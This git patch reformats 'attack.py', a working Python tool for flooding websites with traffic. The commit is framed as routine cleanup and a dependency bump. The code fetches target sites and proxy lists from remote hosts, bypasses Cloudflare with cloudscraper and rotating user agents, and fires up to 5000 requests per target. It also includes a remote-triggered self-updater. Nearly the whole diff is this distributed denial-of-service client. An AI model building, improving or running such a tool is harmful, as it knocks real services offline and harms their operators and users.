From 09b7deabad0f08c2c3e6dad4225c7d79e7309771 Mon Sep 17 00:00:00 2001
From: hryhorii-opanasenko <36611723+SterbenXIII@users.noreply.github.com>
Date: Sat, 26 Feb 2022 23:33:35 +0200
Subject: [PATCH] Update requirements and clean up code

Updated loguru to 0.6.0, reformatted attack.py to PEP 8 style, removed unused imports, and added target/pylist.json with the resolved dependency list.
---
attack.py | 146 ++++++++++++++++++++++++---------------------
requirements.txt | 2 +-
target/pylist.json | 1 +
3 files changed, 80 insertions(+), 69 deletions(-)
create mode 100644 target/pylist.json
diff --git a/attack.py b/attack.py
index 6f022f2..7456985 100644
--- a/attack.py
+++ b/attack.py
@@ -1,12 +1,9 @@
import cloudscraper
-import requests
import os
-from bs4 import BeautifulSoup
from urllib.parse import unquote
from gc import collect
from loguru import logger
from os import system
-from requests import get
from sys import stderr
from threading import Thread
from random import choice
@@ -15,7 +12,6 @@
from pyuseragents import random as random_useragent
from json import loads
-from urllib.request import urlopen
import json
import sys
@@ -24,82 +20,96 @@
MAX_REQUESTS = 5000
disable_warnings()
def clear(): return system('cls')
+
+
logger.remove()
-logger.add(stderr, format="{time:HH:mm:ss} | {level: <8} | {line} - {message}")
+logger.add(
+ stderr, format="{time:HH:mm:ss} | {level: <8} | {line} - {message}")
threads = int(sys.argv[1])
+
def checkReq():
- os.system("python3 -m pip install -r requirements.txt")
- os.system("python -m pip install -r requirements.txt")
- os.system("pip install -r requirements.txt")
- os.system("pip3 install -r requirements.txt")
+ os.system("python3 -m pip install -r requirements.txt")
+ os.system("python -m pip install -r requirements.txt")
+ os.system("pip install -r requirements.txt")
+ os.system("pip3 install -r requirements.txt")
+
def checkUpdate():
- print("Checking Updates...")
- updateScraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
- url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
- try:
- content = updateScraper.get(url).content
- if content:
- data = json.loads(content)
- new_version = data["version"]
- print(new_version)
- if int(new_version) > int(VERSION):
- print("New version Available")
- os.system("python updater.py " + str(threads))
- os.system("python3 updater.py " + str(threads))
- exit()
- else:
- sleep(5)
- checkUpdate()
- except:
- sleep(5)
- checkUpdate()
+    print("Checking for updates...")
+ updateScraper = cloudscraper.create_scraper(
+ browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+ url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
+ try:
+ content = updateScraper.get(url).content
+ if content:
+ data = json.loads(content)
+ new_version = data["version"]
+ print(new_version)
+ if int(new_version) > int(VERSION):
+            print("New version available")
+ os.system("python updater.py " + str(threads))
+ os.system("python3 updater.py " + str(threads))
+ exit()
+ else:
+ sleep(5)
+ checkUpdate()
+    except Exception:
+ sleep(5)
+ checkUpdate()
+
def mainth():
- scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
- scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
-
+ scraper = cloudscraper.create_scraper(
+ browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+ scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
+ 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
- while True:
- scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
- scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
- logger.info("GET RESOURCES FOR ATTACK")
- content = scraper.get(choice(HOSTS)).content
- if content:
- data = loads(content)
- else:
- sleep(5)
- continue
- logger.info("STARTING ATTACK TO " + data['site']['page'])
- site = unquote(data['site']['page'])
- if site.startswith('http') == False:
- site = "https://" + site
- try:
- attack = scraper.get(site)
- if attack.status_code >= 302 and attack.status_code >= 200:
- for proxy in data['proxy']:
- scraper.proxies.update({'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
- response = scraper.get(site)
- if response.status_code >= 200 and response.status_code <= 302:
- for i in range(MAX_REQUESTS):
- response = scraper.get(site)
- logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
- else:
- for i in range(MAX_REQUESTS):
- response = scraper.get(site)
- logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
- except:
- logger.warning("issue happened")
- continue
+ while True:
+ scraper = cloudscraper.create_scraper(
+ browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+ scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
+ 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
+ logger.info("GET RESOURCES FOR ATTACK")
+ content = scraper.get(choice(HOSTS)).content
+ if content:
+ data = loads(content)
+ else:
+ sleep(5)
+ continue
+        logger.info("STARTING ATTACK ON " + data['site']['page'])
+ site = unquote(data['site']['page'])
+        if not site.startswith('http'):
+ site = "https://" + site
+ try:
+ attack = scraper.get(site)
+ if attack.status_code >= 302 and attack.status_code >= 200:
+ for proxy in data['proxy']:
+ scraper.proxies.update(
+ {'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
+ response = scraper.get(site)
+ if response.status_code >= 200 and response.status_code <= 302:
+ for i in range(MAX_REQUESTS):
+ response = scraper.get(site)
+ logger.info("ATTACKED; RESPONSE CODE: " +
+ str(response.status_code))
+ else:
+ for i in range(MAX_REQUESTS):
+ response = scraper.get(site)
+ logger.info("ATTACKED; RESPONSE CODE: " +
+ str(response.status_code))
+        except Exception:
+            logger.warning("request failed, restarting loop")
+ continue
def cleaner():
- while True:
- sleep(60)
- checkUpdate()
- clear()
- collect()
+ while True:
+ sleep(60)
+ checkUpdate()
+ clear()
+ collect()
+
if __name__ == '__main__':
clear()
diff --git a/requirements.txt b/requirements.txt
index db085c4..7b1d493 100755
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,7 +1,7 @@
beautifulsoup4==4.10.0
names==0.3.0
cloudscraper==1.2.58
-loguru==0.5.3
+loguru==0.6.0
requests
urllib3==1.26.7
uuid==1.30
diff --git a/target/pylist.json b/target/pylist.json
new file mode 100644
index 0000000..0b0ef8c
--- /dev/null
+++ b/target/pylist.json
@@ -0,0 +1 @@
+[{"package": "beautifulsoup4", "version": "4.10.0", "deps": [{"package": "soupsieve", "version": "2.3.1"}]}, {"package": "names", "version": "0.3.0", "deps": []}, {"package": "cloudscraper", "version": "1.2.58", "deps": [{"package": "pyparsing", "version": "3.0.7"}, {"package": "charset-normalizer", "version": "2.0.12"}, {"package": "urllib3", "version": "1.26.7"}, {"package": "requests-toolbelt", "version": "0.9.1"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "requests", "version": "2.27.1"}, {"package": "idna", "version": "3.3"}]}, {"package": "loguru", "version": "0.6.0", "deps": []}, {"package": "requests", "version": "2.27.1", "deps": [{"package": "urllib3", "version": "1.26.7"}, {"package": "idna", "version": "3.3"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "charset-normalizer", "version": "2.0.12"}]}, {"package": "urllib3", "version": "1.26.7", "deps": []}, {"package": "uuid", "version": "1.30", "deps": []}, {"package": "pysocks", "version": "1.7.1", "deps": []}, {"package": "pyuseragents", "version": "1.0.5", "deps": []}]
\ No newline at end of file